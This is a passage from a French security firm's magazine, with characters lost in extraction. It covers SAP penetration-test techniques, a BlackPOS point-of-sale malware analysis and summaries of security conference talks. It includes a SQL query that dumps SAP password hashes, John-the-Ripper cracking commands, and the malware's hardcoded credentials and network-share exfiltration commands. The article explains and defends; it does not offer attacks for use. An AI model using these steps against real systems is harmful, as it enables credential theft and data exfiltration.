QuickWin #6 : Maintenir jour les systmes et les ap-
plications.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
15
>>> Bonus #1 : et le stockage des
mots de passe sous SAP ?
Intressons-nous maintenant au stockage de donnes
hautement critiques : les mots de passe des utilisateurs.
En effet, quils soient utilisateurs simples ou admi-
nistrateurs, les mots de passe des comptes sont stocks
dans la base de donnes de lenvironnement SAP et plus
exactement dans la table USR02.
Ces derniers peuvent tre stocks sous plusieurs formats.
Il existe 9 mthodes de stockage possdant toutes leurs
caractristiques propres, comme le montre le tableau sui-
vant :
En loccurrence, les mthodes de chiffrement les plus uti-
lises restent la mthode B et la mthode G sachant que
la mthode G embarque les hashes stocks par les m-
thodes B et F.
En dautres termes, si vous avez la mthode G vous pour-
rez tranquillement mener une attaque de brute-force avec
un fort taux de russite sur les hashes stocks en mode B.
En effet, la casse ntant pas supporte, John-the-Ripper
fera son travail merveille !
Pour cela, une simple requte dans la table USR02 suft
rcuprer tous les identiants et les hashes des tous les
utilisateurs y compris ceux des administrateurs.
Avec SquirrelSQL ou un autre client SQL supportant les
bases de donnes Oracle :
Select bname, bcode, passcode from SID.USR02
BCODE correspondant au hash sous la forme B et PASSCODE
au hash dans sa forme G.
Une fois en possession de ces donnes, il suft de forma-
ter le chier qui sera soumis John-The-Ripper. Cependant
la subtilit rside dans le fait quil faut formater les chiers
contenant les hashes dune manire trs prcise. En effet,
les hashes doivent tre soumis selon les formats suivants
(en laissant 40 caractres entre le login et le hash).
A noter, un script nomm sap_prepare.pl est fourni
avec John-The-Ripper et vous permet de formater ces in-
formations pour quelles soient utilisables directement.
John-The-Ripper propose deux modules permettant de
casser les formes B et G.
Exemples dutilisation :
$ cat hashes.txt
ROOT $9366B3E9E7A71CB0
$ john hashes.txt
$ john --format=sapb hashes.txt
$ cat hashes.txt
username:ROOT $9366B3E9E7A71CB0
$ john hashes.txt
$ john --format=sapb hashes.txt
Sous la forme sapg, il faut respecter le format similaire :
$ cat hashes.txt
ROOT $1194B48F14B9F3F-
8DA1B181F14DEB70E7BDDD239
$ john hashes.txt
$ john --format=sapg hashes.txt
$ cat hashes.txt
username:ROOT $1194B48F14B9F-
3F8DA1B181F14DEB70E7BDDD239
$ john hashes.txt
$ john --format=sapg hashes.txt
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
16
>>> Bonus #2 : Exemple dintrusion simple
Voici un cas concret dexploitation du manque de scurisation du protocole SAPDIAG.
Tout dabord on effectue une attaque de type Man-in-the-Middle entre un client lourd et les serveurs SAP puis on capture
le trac rseau. Il est alors possible dutiliser un plugin Wireshark (voir plus haut) pour dcoder le trac :
On obtient ainsi un compte SAP valide, qui permet alors lutilisation du client SAPGUI, partir duquel on peut tenter dutili-
ser des transactions dangereuses, SE49 ou SM69 par exemple, qui permettent lexcution de commandes sur le systme :
A partir dici, on se retrouve dans une conguration semblable celle dun scnario dintrusion interne en bote grise : un
pied dans linfra SAP avec un compte de service, ouvrant tout un panel de nouvelles actions (rebond, lvation de privi-
lges, vol dinformations, etc.). Il ny a plus qu ! , en somme :-)
Tests intrusion SAP
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
17
>>> Bonus #3 : Exemple dintrusion avance
Nous prsentons ici un exemple dintrusion ralis par les consultants du cabinet sur un environnement SAP. Lattaque
sappuie sur lexploitation de plusieurs vulnrabilits an de prendre le contrle total de linfrastructure SAP.
Le point de dpart de cette attaque est la dcouverte sur lun des serveurs de la prsence dun servlet de conguration
accessible sans authentication. Or, ce servlet, joignable lURI /ctc/servlet, accepte plusieurs paramtres dont certains
peuvent permettre lexcution de code distance sur le serveur.
Un code dexploitation est disponible au sein du framework Metasploit :
Il est alors ais de parcourir le systme la recherche de donnes intressantes. En loccurrence, les connecteurs de base
de donnes sont prsents au sein de chiers de conguration SAP CongTool.
Le chier SecStore.property contient notamment les chanes de connexion aux bases Oracle, chiffres :
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
18
Et la cl de chiffrement est prsente au sein du chier SecStore.key :
Puisque nous possdons la cl de chiffrement et que lalgorithme utilis est connu (Triple DES), nous pourrions implmenter
rapidement un court programme ou un script se chargeant du dchiffrement. Mais pourquoi faire compliqu quand SAP
nous fournit les outils dont nous avons besoin ?
Cong Tool est un utilitaire fourni par SAP qui permet de mettre jour ses chiers de conguration, sans pour autant
rvler les mots de passe contenus dans le chier. Les captures suivantes illustrent comment charger un chier SecStore.
properties et sa cl.
Les mots de passe sont masqus dans linterface, mais pour dchiffrer les noms dutilisateur, noms de base de donnes,
adresses et port, il faut dchiffrer toute la chane. Tentons donc de gnrer un dump du tas mmoire de cette application
Java :
En ltrant uniquement les chaines de caractres valides, on retrouve sans difcult toutes les informations de connexion,
mots de passe inclus :
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
19
Ce mot de passe nous a alors permis de nous connecter une base de donnes Oracle hbergeant des donnes SAP et ainsi
rcuprer les hashes de tous les utilisateurs et des administrateurs :
Mais surtout, le mme mot de passe est utilis pour protger linterface dadministration Web de NetWeaver, nous permet-
tant de prendre le contrle total de lenvironnement SAP :
On notera que la simple protection du servlet CongServlet par un mcanisme dauthentication aurait suf prvenir
totalement cette intrusion...
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
20
> Analyse du malware BlackPOS
Nous vous prsentions dans le prcdent numro lattaque ayant cibl la socit Target Corp. en n danne 2013. Cette
attaque sappuyait sur le malware BlackPOS et avait entran le vol des donnes bancaires de plus de 40 millions de clients
sur les serveurs montiques (POS) de Target.
En nous aidant de diverses analyses publies sur Internet [1][2], nous vous proposons une prsentation dtaille du
malware et des modes opratoires utiliss lors de cette vaste attaque.
par Thomas LIAIGRE et Etienne BAUDIN
Aprs avoir dni quelques notions utiles la bonne comprhension du dossier, nous vous proposerons un panorama gnral
du mode opratoire utilis.
Nous nous focaliserons ensuite sur le fonctionnement dtaill du malware. Enn, nous nous interrogerons sur les possibles
lments de faiblesse ayant permis le droulement de cette attaque.
> Rappel gnral
Cette partie aborde quelques notions importantes pour la suite du dossier : nous dnirons ce quest un POS ( serveur mon-
tique en franais) et dtaillerons la structure dune piste de carte bancaire.
Serveur montique ou POS
Un Point of Sale en anglais, souvent abrg par POS, est une machine qui permet le traitement du paiement dun bien
ou dun service par un client. Ce terme gnral dnit un large panel dquipements : ordinateurs installs aux caisses des
grandes surfaces, bornes de paiement de parking, bornes dachat de billets de train, etc.
BlackPOS
S
e
t
h

A
n
d
e
r
s
o
n
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
21
Malgr leur aspect inhabituel, ces machines sont souvent des serveurs utilisant le systme Windows XP, ou une de ses va-
riantes, comme WEPOS (Windows Embedded Point Of Sale). Une ou plusieurs applications sont ensuite excutes an de
permettre la ralisation et le traitement des paiements par les clients.
Bande magntique des cartes bancaires
Lorsquil valide un paiement par carte bancaire, le POS va lire lensemble des informations sur la bande magntique de la
carte, aussi appele piste. Les informations contenues sur une piste de type 1 (IATA) sont structures de la manire ci-dessous
et sont spares par des caractres de dlimitation (appels sparateurs ou sentinelles) :
BlackPOS
> Droulement de lattaque
A la suite des diverses informations publies sur Internet et grce lanalyse comportementale du malware, le cheminement
gnral de lattaque ci-dessous a pu tre retrac.

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
22
Etape 1 : Infection de Fazio Mechanical, prestataire de Target
Lentreprise Fazio Mechanical est un prestataire en charge de la gestion du chauffage, ventilation et climatisation. Fazio
Mechanical a t victime dune campagne de-mails vrols par le malware Citadel . Cette infection a permis la rcupra-
tion didentiants permettant daccder des applications exposes par la socit Target. [3]
Etape 2 : Compromission dun serveur dchange entre Target et ses prestataires
Target exposait des applications permettant de grer la gestion de projet et la facturation avec ses prestataires. En utilisant
les identiants rcuprs lors de ltape 1, les attaquants ont pu se connecter sur une de ces applications, la compromettre et
accder au systme sous-jacent. [3]

Etape 3 : Compromission du rseau Target
Une fois le serveur dchange compromis, ils ont pu rebondir sur le rseau Target.
Cette tape est reprsente en ches discontinues car nous navons pas le dtail des actions ralises lors de la compromis-
sion. Nous savons toutefois que des identiants et des informations sur ladressage interne ont t rcuprs.
Etape 4 : Personalisation du malware BlackPOS
BlackPOS na pas t spciquement dvelopp pour Target puisque diverses variantes de ce malware, certaines antcdentes
laffaire Target, ont t identies. [4]
Nanmoins, lors de lanalyse du malware, nous constatons que des identiants et des adresses IP internes spciques au
contexte de Target sont cods en dur dans lexcutable. Cela indique quune version spcique a t adapte au contexte
Target.
Etape 5 : Installation du malware BlackPOS sur les serveurs montiques
Lors de la compromission du rseau (tape 3), les attaquant ont accd par rebond aux serveurs montiques. Une fois que le
malware a t adapt leurs besoins (tape 4), les serveurs montiques ont t infects.
Linstallation du malware ncessite des privilges levs pour la cration dun service et la lecture de la mmoire. Aucune
information concernant linstallation du malware ou lobtention de droits administrateurs sur les serveurs montiques na t
dvoile.
Le malware tait charg de drober les pistes de cartes bancaires en mmoire, son fonctionnement sera dtaill dans les
paragraphes suivants de ce dossier.
Etape 6 : Centralisation des donnes au sein du rseau Target
Cette attaque a cibl des serveurs montiques sur lensemble du territoire des Etats-Unis, ce qui constituait un nombre impor-
tant de machines. Chaque POS transmettait quotidiennement les donnes bancaires drobes sur un serveur de centralisation
contrl par les attaquants au sein du rseau Target.
Etape 7 : Dplacement des donnes vers un serveur dexltration
Une fois les donnes obtenues, celles-ci devaient tre exltres en dehors du rseau Target. Les donnes taient donc dpla-
ces sur un serveur dexltration ayant la possibilit de communiquer avec lextrieur du rseau Target.
Etape 8 : Exltration des donnes
Les attaquants ont nalement exltr les donnes via le protocole FTP vers un serveur externe quils avaient pralablement
compromis. Durant 2 semaines, les pirates ont ainsi t en mesure de drober 11 Go de donnes. [5]
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
23
> Fonctionnement gnral de BlackPOS
Lorsque BlackPOS est actif, il recherche la prsence dun processus nomm POS.exe . Cest ce processus qui est charg de la
ralisation du paiement, et donc du traitement des cartes bancaires.
Lorsque le processus POS.exe est actif, BlackPOS parcourt la mmoire vive (RAM) de ce processus an didentier et de
drober les informations bancaires.
Une fois ces donnes identies, le malware les encode en base64 avec un alphabet spcique (voir ci-aprs) et les stocker
au sein du chier winxml.dll cr dans le rpertoire C:\WINDOWS\SYSTEM32.
Le chier winxml.dll est ensuite transfr de manire rcurrente sur le serveur de centralisation.
Lorsque le processus POS.exe est actif,
BlackPOS parcourt la mmoire vive (RAM) de ce processus
an didentier et drober les informations bancaires.
Nous notons que la version du malware tudie nest pas trs perfectionne : le processus nessaie pas de se camouer et est
visible au sein du gestionnaire des tches. Par ailleurs, il nutilise pas les API Windows pour exltrer les informations mais uti-
lise simplement linvite de commande Windows. De plus, aucun mcanisme dobfuscation na t utilis lors de la compilation
du malware an de compliquer sa rtro-ingnierie.
Nous vous proposons ci-dessous une analyse statique et dynamique dlments intressants de ce programme.
> Analyse statique de BlackPOS
Cration et lancement du service
Le binaire correspondant au malware est enregistr en tant que service Windows, et est congur pour se lancer chaque
dmarrage du systme. On peut ds lors voir cet lment parmi les services Windows :

La dnition des paramtres du service est dnie dans le code ci-dessous.
On peut constater que le processus sinstalle en service en prcisant la dnition du type de dmarrage (dmarrage automa-
tique), le type de service (process win32), ou encore du nom du service (POSWDS).
Cette action ncessite les droits administrateur sur la machine.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
24
Scan des processus
Une fois le service lanc, le binaire va scanner les processus en cours dexcution et rechercher le processus pos.exe . Le
malware va par la suite lire la mmoire de ce processus.

On peut ainsi observer dans le code assembleur lappel la fonction Windows ReadProcessMemory avec ses diffrents para-
mtres :
+
hProcess est un handle du processus en mmoire qui est lu ;
+
lpBaseAddress est un pointeur vers ladresse mmoire (appartenant au processus) partir de laquelle il faut lire ;
+
lpBuffer est un pointeur vers une zone tampon qui reoit le contenu de la mmoire ;
+
nSize est la quantit de donnes lire dans le processus spci ;
+
lpNumberOfBytesRead est un pointeur vers une variable qui reoit la quantit de donnes envoyes la zone tampon.
Cet appel de fonction ncessite que lapplication dispose du privilge SeDebugPrivilege. Celui-ci est obtenu en excutant le
programme avec les droits dadministrateur.
Centralisation des donnes bancaires
Lextraction des donnes contenues dans les pistes
est ensuite opre. An dtre exltres, les donnes
sont encodes en base64. Le base64 est une mthode
reprsentant les donnes par groupe de 6 bits. Len-
semble de ces valeurs possible est donc de 64 possi-
bilits.
Chaque groupe de 6 bits est reprsent par un caractre
spcique. Cest ce quon appelle lalphabet base64.
BlackPOS
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
25
BlackPOS
Il est cependant possible de choisir un alphabet alternatif. Cest un procd couramment utilis au sein des malwares puisquil
permet de mettre en place un chiffrement simpli peu de frais (il est ncessaire de connatre lalphabet utilis pour
dcoder le message).
Dans le cas de BlackPOS, lalphabet utilis est le suivant : JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/
y1xwvpHiLAzSau .
Cette chane nest pas directement accessible dans le code assembleur, mais rsulte doprations de permutations sur la
chane sNbrlSfyBM2PR57Tq3QeVpnW4+w8JOHK6CoguYxvk/IdZ0LXjUaAhGzDFmct9Ei1 .
Envoi des journaux dvnements
Par la suite, un thread est cr pour lupload des donnes bancaires prcdemment identies. Cette opration va tre excu-
te une fois toutes les sept heures. Aussi, elle ne sexcutera quentre 10h et 17h. Lide est de cacher le trac rseau gnr
par le malware au sein dun trac normal dune journe de travail.
> Analyse dynamique de BlackPOS
Architecture de test
An dobserver le fonctionnement du malware, nous avons mis en place une architecture avec un POS victime infect et un
serveur de centralisation.
Comme nous le prcisions lors de la prsentation gnrale de lattaque, des informations spciques au contexte de Target
(identiants, adresses IP) sont codes en dur dans le malware.
Nous adaptons donc notre architecture ces informations an que le malware fonctionne :
+
ladresse IP du serveur de centralisation est 10.116.240.31 ;
+
le partage administratif C$ est actif sur le serveur de centralisation ;
+
la commande dextraction utilise le compte Best1_user pour se connecter sur la machine ou le domaine ttcopscli3acs
. Nous nommons donc notre serveur de centralisation de cette manire an dviter de ne pas avoir crer un domaine, et
crons le compte Best1_user ;
+
le mot de passe associ au compte Best1_user est BackupU$r ;
Larchitecture mise en place est donc la suivante :

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
26
Rcupration de lchantillon du malware
An dinfecter notre architecture, nous avons d rcuprer un chantillon du malware. Le journaliste Brian Krebs a publi un
rapport danalyse threatexpert [6] du malware. Nous nous sommes bas sur lempreinte de chier MD5 (0xCE0296E2D77EC3B-
B112E270FC260F274) publie dans cette analyse an de rcuprer lchantillon sur le site www.virusshare.com.
An de nous assurer que nous travaillons avec le bon chier, nous vrions lempreinte de celui-ci :

Nous avons nomm notre chantillon BlackPOS.exe durant la suite de cette tude. Celui-ci tait probablement nomm diff-
remment au sein du rseau de Target.

Infection de la machine victime
Aprs avoir infect le POS, nous pouvons observer que le service POSWDS a bien t cr sur notre machine. Il est int-
ressant de noter que la ralisation de cette action ncessite que le malware ait t excut avec les privilges administrateur.
Ces privilges administrateur seront ensuite ncessaires au programme pour accder la mmoire des autres processus.
La prsence du processus que nous venons de crer peut tre observe dans le gestionnaire des tches :

Cration du processus POS.exe
Comme prsent prcdemment, le malware recherche la prsence dun processus nomm POS.exe et contenant des
pistes de cartes bancaires.
Nous ralisons donc un programme correspondant ces exigences, le code source est prsent ci-dessous. Vous reconnatrez
les informations dune piste magntique (avec les caractres de sparation) au sein de la chane de caractres PAN_1.

Le programme boucle linni an de nous assurer que celui-ci sera actif simultanment BlackPOS.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
27
Journalisation des pistes bancaires
Lorsque BlackPOS et notre processus POS.exe sont actifs, un chier nomm winxml.dll est cr sur le serveur victime au
sein du rpertoire C:\WINDOWS\system32. Comme prvu, les informations sont inintelligibles car elles sont encodes en
base64 avec lalphabet spcique.

Exltration des donnes
Une fois les donnes bancaires drobes, le malware va les transmettre au serveur de centralisation. A laide de lapplication
Procmon, nous pouvons observer la squence de commande ralise par le malware pour lexltration des donnes.

La premire action ouvre une invite de commande et lui transmet la commande suivante net use S: \\10.116.240.31\c$\
WINDOWS\twain32 /user:ttcopscli3acs\Best1_user BackupU$r . Cette action va monter un partage rseau du serveur de
centralisation sur le lecteur S en utilisant le compte Best1_user.
La seconde action ouvre une invite de commandes et lui transmet la commande suivante move C:\WINDOWS\system32\
winxml.dll S:\ hostnameVictime_jour_mois_heure.txt . Cette commande copie le chier winxml.dll contenant les informa-
tions encodes sur le serveur de centralisation au format hostnameVictime_jour_mois_heure.txt. Le chier winxml.dll est
ensuite supprim.
La dernire action ouvre une invite de commandes et excute la commande net use S: /del . Cela permet la suppression
du partage rseau mont prcdemment.
La succession de ces actions est sufsament rapide pour rester invisible aux yeux dun utilisateur sur le systme.
Dcodage des donnes
Sur le serveur de centralisation, nous constatons ensuite la cration dun chier contenant notre piste encode au sein du
rpertoire C:\WINDOWS\twain_32 au format hostnameVictime_jour_mois_heure.txt :

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
28
An de les dcoder, nous utilisons le programme Python ci-dessous. Celui-ci utilise une base de correspondance entre lalpha-
bet du malware et lalphabet base64 standard an de rencoder les donnes en base64 standard. Il nous suft ensuite de les
dcoder.

Nous retrouvons la piste initialement renseigne dans notre programme POS.exe (la partie |ADD%| est ajoute par le malware
lors du traitement de la chane) :
> Les points dinterrogations...
Target ayant t certi PCI DSS en septembre 2013 [7][8], un certain nombre de bonnes pratiques auraient d tre respectes
sur le primtre PCI ainsi que sur lensemble du SI. Pourtant, diverses questions se posent quant au respect de ces bonnes
pratiques. Il ne sagit que de premires pistes de rexions. Dautres exigences auraient d empcher un tel vol de donnes
si elles avaient t correctement implmentes.

Scurit du serveur dchange Target-prestataires
Le premier point dinterrogation ne concerne pas le standard PCI DSS mais le respect de bonnes pratiques gnrales.
Les attaquants nauraient pas d pouvoir prendre le contrle du serveur dchanges entre Target et ses prestataires. Cela pose
la question de la scurit des applications exposes sur ce serveur (failles applicatives, conguration trop permissive, etc.) et
de la ralisation daudits de scurit sur ce primtre.
Une fois le serveur compromis, les attaquants ne possdaient que les privilges du service compromis. Si ce service tait
correctement congur, celui-ci aurait du fonctionner avec des comptes de services privilges restreints. Ils nauraient donc
pas d pouvoir rebondir sur dautres systmes avec ces comptes (restriction des mthodes dauthentication des comptes de
service au sein des GPO) ou excuter des actions permettant le rebond sur des serveurs tiers (vol de hashes, extraction des
mots de passe en mmoire, etc.). Pourtant, les attaquants ont russi rebondir jusquaux POS sur lesquels ils disposaient des
privilges dadministration (ncessaires pour linstallation du service malveillant).
Enn, lutilisation de mthodes dauthentication fortes (tokens OTP) aurait empch la compromission de ce serveur partir
des identiants dun prestataire.
BlackPOS
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
29

Cloisonnement des ux entre les diffrentes zones
Le second point sensible concerne le cloisonnement des
ux entre les diffrentes zones de Target, notamment si
lon considre tle premier chaptre des exigences PCI DSS
traitant de ce sujet ( Build and Maintain a Secure Network
).
Linterrogation porte spciquement sur les ux suivants :
+
entre serveur dchange Target-Prestataire et les POS ;
+
entre le POS et le serveur de centralisation (SMB) ;
+
entre le serveur de centralisation et le serveur dexl-
tration ;
+
entre le rseau de Target et lextrieur (FTP).
Soit ces ux taient lgitimes, et nous ne comprenons pas
forcment dans quel but, soit ces ux taient illgitimes et
ils auraient du tre rejets et gnrer des alertes compte
tenu du volume de donnes exltres.
Intgrit du systme des POS
Enn, la recommandation 11.5 du standard PCI exige que
des outils contrlent lintgrit des chiers et des rper-
toires sensibles des systmes dans le primtre. Cette
rgle ne spcie pas expressment les chiers et rper-
toires sensibles, mais il nous apparat vident que le r-
pertoire SYSTEM32, contenant les excutables du systme,
rentre dans cette catgorie. Ainsi une alerte aurait d tre
leve lors de la cration du chier winxml.dll dans ce r-
pertoire.
Rfrences
+
[1] http://h30499.www3.hp.com/t5/HP-Security-Re-
search-Blog/An-evolution-of-BlackPOS-malware/ba-
p/6359149
+
[2] http://securityintelligence.com/target-data-
breach-kaptoxa-pos-malware/
+
[3] http://krebsonsecurity.com/2014/02/email-attack-
on-vendor-set-up-breach-at-target/
+
[4] http://krebsonsecurity.com/2014/01/a-rst-look-
at-the-target-intrusion-malware/
+
[5] http://krebsonsecurity.com/2014/01/a-closer-
look-at-the-target-malware-part-ii/
+
[6] http://krebsonsecurity.com/wp-content/
uploads/2014/01/POSWDS-ThreatExpert-Report.pdf
+
[7] http://www.businessinsider.my/target-was-war-
ned-about-data-breach-2014-3/
+
[8] http://www.pcworld.com/article/2111980/secu-
rity-vendor-trustwave-named-in-targetrelated-suit.html
BlackPOS
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
30
> Jour 1
Keynote An amazing keynote
Edmond bigezey Rogers
Edmond Rogers, chercheur luniversit de lIllinois et
animateur de la confrence, a ouvert le bal pour ces trois
jours de confrence.
Edmond a commenc par un bref discours douverture. Il a
insist sur la difcult quont les professionnels de la scu-
rit caractriser les multiples vulnrabilits rencontres
sur leurs systmes et isoler les informations pertinentes.
An de raliser cette caractrisation, Edmond nous a pr-
sent le modle CPTL (Cyber-Physical Topology Language),
un modle bas sur la thorie des graphes ayant pour
objectif lutilisation de mtriques comprhensibles par
tous. Ce modle a t appliqu avec succs par des cher-
cheurs an de drouler un audit de vulnrabilits sur les
infrastructures lectriques aux tats-Unis.
Lutilisation de ce modle, et dautres systmes adapts
seront daprs lui ncessaires pour faire face aux nom-
breuses vulnrabilits rencontres et scuriser les diff-
rents systmes.
Hacking Telco equipment : The HLR/HSS
Laurent Ghigonis
+
Slides
http://2014.hackitoergosum.org/slides/day1_Hacking-tel-
co-equipment-The-HLR-HSS-Laurent-Ghigonis-p1sec.pdf
Laurent Ghigonis, consultant chez P1 security, a prsent
une tude de la scurit des HLR (Home Location Register)
et des HSS (Home Suscriber Server) au sein des rseaux de
tlphonie mobile.
> Confrences scurit
HES
par Thomas LIAIGRE
Arnaud REYGNAUD
Cyril LORENZETTO
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
31
Brian ont ralis une analyse de scurit de ces rseaux
tant au niveau du front-end (communication radio entre les
terminaux mobiles et les antennes) quau niveau du back-
end (cur de rseau des oprateurs de tlphonie mobile).
Leur constat est que les rseaux LTE souffrent de diffrentes
vulnrabilits permettant la reconnaissance dlments de
larchitecture rseau (depuis les terminaux mobiles ou via
le scan de plages IP doprateurs), le dchiffrement des
communications entre les diffrents quipements et lin-
tgration dantennes matrises par lattaquant au sein des
rseaux doprateur.
Cette prsentation soulve la question de la condentialit
des changes utilisateurs via les terminaux mobiles sur les
rseaux LTE.
WMI Shell : A new way to get shells on remote Win-
dows machines using only the WMI service
Andrei Dumitrescu
+
Slides
http://2014.hackitoergosum.org/slides/day1_WMI_Shell_
Andrei_Dumitrescu.pdf
+
Outils
https://www.lexsi.fr/conference/wmi-shell.zip
En dbut daprs-midi, Andrei Dimitrescu, consultant chez
Lexsi, a ralis une prsentation sur les objets WMI (Win-
dows Management Instrumentation) et la possibilit de les
utiliser an de compromettre un systme distant.
Les HLR/HSS sont les quipements du rseau responsables
du stockage des donnes utilisateurs (identiant et locali-
sation de labonn, services souscrits, etc.). Ils sont massi-
vement interconnects (Internet, rseau oprateur) et sap-
puient sur un grand nombre de services et dapplications
internes.
Les consultants de P1 ont constat quun HLR/HSS peut tre
mis hors service laide de paquets forgs par un attaquant.
Si ce dni de service cible lensemble des quipements du
rseau dun oprateur, ce rseau sera entirement indis-
ponible.
Par ailleurs, des vulnrabilits locales sont aussi prsentes
puisquun utilisateur connect sur un HLR/HSS peut facile-
ment lever ses privilges an de devenir administrateur
sur le systme.
Ces vulnrabilits soulvent donc le problme de la dispo-
nibilit des rseaux mobiles et des possibilits quont les
attaquants les compromettre.
LTE vs Darwin : The Evolution Strikes Back ?
Hendrik Schmidt & Brian Butterly
+
Slides
http://2014.hackitoergosum.org/slides/day1_ERNW_LTEvs-
Darwin_HES.pdf
Hendrik Schmidt et Brian Butterly, consultants chez ERNW,
ont poursuivi la matine sur le thme de la scurit au sein
des rseaux LTE (Long Term Evolution) de tlphonie mo-
bile.
LTE est la norme la plus rcente des rseaux de tlpho-
nie mobile, commercialise sous le nom de 4G. Hendrik et
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
32
Applying science to eliminate 100% of buffer over-
ows
Andreas Bogk
Slides
http://2014.hackitoergosum.org/slides/day1_Applying_
science_to_eliminate_100%25_of_buffer_overflows_
Andreas_bogk.pdf
Andreas Bogk est un membre actif du CCC (Chaos Compu-
ter Club), actuellement architecte scurit pour applications
mobiles au sein de la socit HERE.
Sa prsentation portait sur loutil SoftBoundCETS. Cet outil,
intgrer dans le processus de compilation des binaires,
permet de prvenir les vulnrabilits de type dpasse-
ment de tampon (erreurs spatiales) et use-after-free
(erreurs temporelles).
En plus de la prsentation de loutil, cette prsentation a
permis un rappel des bonnes pratiques lors du dveloppe-
ment en C (vrications raliser, gestion de la mmoire
partage).
Andreas a ralis la transposition de cet outil sur le systme
dexploitation FreeBSD.
Les objets WMI permettent dobtenir des informations (uti-
lisateurs, paramtrage rseau, processus) et de raliser des
commandes (cration/suppression de processus, appel de
commandes systmes) sur un systme Windows. Ces objets
peuvent tre appels distance laide doutils spciques
(wmic sur Windows et wmis sur Linux).
Andrei a dvelopp un outil nomm wmi-shell permet-
tant dutiliser ces proprits dappel distance lors dun test
dintrusion. Lauditeur spcie des commandes qui seront
passes au systme distant. Si des informations sont ex-
ltrer, elles seront crites dans un chier temporaire et ra-
patries sur le systme de lauditeur.
La ralisation de cette action ncessite louverture du port
135 sur le systme distant et la possession des identiants/
hash dun compte habilit requter les objets WMI.
> INFO
Hack In Paris : 4me round
Pour la 4me anne conscutive, la confrence Hack In Paris se
droulera au Centre des Confrences de Disneyland Paris. Ras-
semblant les grands noms de la scurit informatique et du
hacking, lvnement est devenu incontournable pour les pro-
fessionnels de la scurit.
Les confrences, au nombre de 16, proposes exclusivement en
anglais runiront les professionnels de la scurit informatique
(DSI, RSSI, RSI) et les experts techniques du hacking. Lvne-
ment se tiendra du 26 au le 27 juin au Centre de Congrs de Dis-
neyland Paris. A noter, chaque place achete pour Hack in Paris
donne accs la Nuit du Hack qui se droulera les 28 et 29 juin !
Lvnement comporte galement 10 formations proposes par
des experts techniques sur 3 jours du 23 au 25 juin.
XMCO sera partenaire mdia et proposera un rsum des conf-
rences au sein du numro #38 de lActuScu.
HES
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
33
> Jour 2
Vaccinating APKs
Milan Gabor & Danijel Grah
+
Slides
http://2014.hackitoergosum.org/slides/day2_Vaccinating_
APK%E2%80%99s_Hackito-2014-MilanGabor-DanijelGrah.
pdf
La premire confrence de la journe, prsente par Milan
Gabor et Danijel Grah (deux chercheurs de lentreprise slo-
vne Viris spcialise en scurit informatique), part dun
constat simple : Android est selon les statistiques, le sys-
tme mobile le plus cibl par les pirates.
Cette problmatique est essentiellement lie aux tests des
applications qui nentrent pour ainsi dire plus dans le pro-
cessus de dveloppement. Autre constat, les dveloppeurs
comme les utilisateurs sont davantage concentrs sur les
fonctionnalits plutt que sur les composants de scurit.
Tous ces lments offrent donc de multiples vecteurs dat-
taques.
Aprs avoir rappel les bases des applications Android
(quest-ce quun .apk, Java, principe des Activities, Services,
etc.), les deux confrenciers ont voqu les mthodes per-
mettant de reverser des applications en listant quelques
outils utiliss (Dex2Jar, JD-GUI, etc.) ainsi quen rappelant la
diffrenciation entre analyse statique (lecture du code) et
dynamique (monitoring, remoting, debugging, etc.).
Ils ont ensuite prsent leur projet permettant dinjecter un
service au sein dune application via lutilisation des outils
Fino et BeanShell. Ils peuvent ensuite analyser et modier
le comportement de lapplication lors de son excution
(modication des valeurs des variables, appels de fonctions
arbitraires, excution de code Java).
Une dmonstration a t ralise leur permettant de tri-
cher dans des jeux (la modication des variables en temps
rel leur permettant dobtenir le meilleur score), mais cela
pourrait galement servir envoyer des SMS durgence
(classe 0), consulter des informations normalement inac-
cessibles, etc.
Lobjectif est dsormais de tout runir en un seul et mme
outil et si possible dinjecter le service en amont et non en
rinstallant lAPK.
The government as your hacking partner: using public
data to block passports, national ID cards, steal tax
data, and other mischievous deeds
Jos Garduo
Jos Garduo a ensuite prsent une tude opposant la po-
litique de publication des donnes du gouvernement chilien
(transparence de linformation) au respect de la vie prive.
Jos est parti dlments publis sans restriction sur les
bases de donnes du gouvernement (nom, adresse, num-
ro didentit, sexe). Ces informations ont pu tre utilises
pour obtenir dautres donnes. De proche en proche, il a
ainsi pu raliser une cartographie complte des informa-
tions accessibles pour nimporte quel citoyen chilien (fa-
mille, numro dimmatriculation, numro de passeport,
donnes mdicales, fonds de pension, etc.).
Les informations obtenues sont sufsantes pour usurper
une identit ou raliser des actions la place dune per-
sonne (rvocation ou cration de documents ofciels, rcu-
pration dactes de naissance/mariage/dcs, etc.).
Il a galement dvelopp un outil (bas sur le framework
python Django et sur diverses bibliothques) permettant
dautomatiser cette agrgation dlments didentit.
Il a par ailleurs ralis une application de phishing utilisant
ces lments. Lapplication simule le comportement dun
serveur vocal interactif an de demander lutilisateur des
informations condentielles complmentaires.
Il a ensuite largi cette problmatique de la condentia-
lit des donnes personnelles en ajoutant quen plus des
donnes publies par le gouvernement, les utilisateurs
publient eux aussi de nombreuses informations sensibles
(rseaux sociaux, blogs, etc.).
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
34
Hardware Security Modules: attacks and secure con-
guration
Graham Steel
+
Slides
http://2014.hackitoergosum.org/slides/day2_Hardware_
